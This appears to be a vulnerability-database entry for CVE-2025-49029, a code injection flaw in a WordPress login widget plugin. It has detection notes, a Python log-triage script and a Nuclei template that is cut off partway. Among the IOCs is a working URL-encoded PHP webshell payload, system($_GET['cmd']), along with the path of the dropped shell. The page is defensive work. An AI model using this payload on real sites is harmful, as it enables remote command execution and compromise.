CVE-2025-49029
Published 2025-07-01
Priority P2 · 60 · critical · 9.1 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
EXPLOIT
EPSS: 2.12% (79.6th percentile)
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget (custom-login-and-signup-widget) allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bitto.kazi | custom_login_and_signup_widget | <= 1.0 | — |
Detection & IOCs (extracted from sources)
Command (IOC, URL-encoded request body): `text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit`
- Detect exploitation attempts by monitoring POST requests to the plugin settings page with PHP webshell payloads in the `text` parameter.
- Monitor for GET requests to the dropped webshell at /wp-content/plugins/custom-login-and-signup-widget/content/sn.php, especially with a `cmd` query parameter.
- A successful exploitation results in HTTP 500 from the dropped sn.php file; correlate with a prior POST to the settings page containing PHP code in the `text` field.
- Use a publicwww/FOFA fingerprint to identify exposed vulnerable instances.
- The attack requires authentication as an administrator; look for an admin login followed immediately by a POST to the plugin settings page with PHP code in the body.
- Note: exploitation requires administrator-level authentication; unauthenticated exploitation is not possible with this CVE.
- Note: affected versions are Custom Login And Signup Widget from n/a through 1.0 only.
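The correlation described in the detection notes above, as an added example that is not part of the advisory or any vendor tooling: it walks a constructed WAF-style request log (records that retain the POST body) and raises an alert for a PHP open tag in the `text` field of a settings-page POST, for any hit on the dropped sn.php, and upgrades the latter to a full chain when the same source IP posted the injection earlier. The settings-page URL shape (`/wp-admin/admin.php?page=<slug>`) and the 302-on-login heuristic are assumptions; the sn.php path is taken from the IOC list.

```python
from urllib.parse import parse_qs, urlsplit

PLUGIN_SLUG = "custom-login-and-signup-widget"
# Dropped-file path taken from the IOC list; the settings-page URL shape is an assumption.
SHELL_PATH = f"/wp-content/plugins/{PLUGIN_SLUG}/content/sn.php"

# Constructed sample request log (WAF-style records that retain the POST body).
SAMPLE_LOG = [
    {"ts": 1, "src": "198.51.100.7", "method": "POST", "path": "/wp-login.php",
     "status": 302, "body": "log=admin&pwd=REDACTED"},
    {"ts": 2, "src": "198.51.100.7", "method": "POST",
     "path": "/wp-admin/admin.php?page=custom-login-and-signup-widget", "status": 200,
     "body": "text=%3C%3Fphp+%2F%2A+constructed+sample+%2A%2F+%3F%3E&submit=Submit"},
    {"ts": 3, "src": "198.51.100.7", "method": "GET", "status": 500, "body": "",
     "path": "/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=REDACTED"},
    {"ts": 4, "src": "203.0.113.9", "method": "POST", "status": 200,
     "path": "/wp-admin/admin.php?page=custom-login-and-signup-widget",
     "body": "text=Welcome+back%21&submit=Submit"},   # benign settings change
]

def is_login_success(rec):
    # Assumption: a POST to wp-login.php answered with 302 is a successful login.
    return (rec["method"] == "POST" and urlsplit(rec["path"]).path == "/wp-login.php"
            and rec["status"] == 302)

def is_php_injection_post(rec):
    # POST to the plugin settings page whose `text` field carries a PHP open tag.
    if rec["method"] != "POST" or PLUGIN_SLUG not in rec["path"]:
        return False
    fields = parse_qs(rec.get("body", ""), keep_blank_values=True)  # percent-decodes values
    return any("<?php" in v.lower() for v in fields.get("text", []))

def is_shell_request(rec):
    return rec["method"] == "GET" and urlsplit(rec["path"]).path == SHELL_PATH

def triage(records):
    """One alert per suspicious event; an sn.php hit becomes 'full_chain' when the
    same source IP already posted PHP into `text` earlier in the log."""
    alerts, seen = [], {}
    for rec in sorted(records, key=lambda r: r["ts"]):
        ip = rec["src"]
        if is_login_success(rec):
            seen.setdefault(ip, {})["login_ts"] = rec["ts"]
        elif is_php_injection_post(rec):
            seen.setdefault(ip, {})["inject_ts"] = rec["ts"]
            alerts.append({"kind": "inject_post", "src": ip, "ts": rec["ts"]})
        elif is_shell_request(rec):
            ctx = seen.get(ip, {})
            kind = "full_chain" if "inject_ts" in ctx else "shell_hit"
            alerts.append({"kind": kind, "src": ip, "ts": rec["ts"], "status": rec["status"],
                           "login_ts": ctx.get("login_ts"),
                           "cmd_param": "cmd" in parse_qs(urlsplit(rec["path"]).query)})
    return alerts
```

Plain access logs do not carry POST bodies, so the first check only works on WAF or reverse-proxy logs that retain them; the sn.php check works on ordinary access logs as well.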
No detection rules found.
Nuclei
CVE-2025-49029: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0.
Template:

```yaml
id: CVE-2025-49029
info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0
  impact: |
    Authenticated administrators can inject arbitrary PHP code through the plugin settings, potentially achieving
```
No writeups or analysis indexed.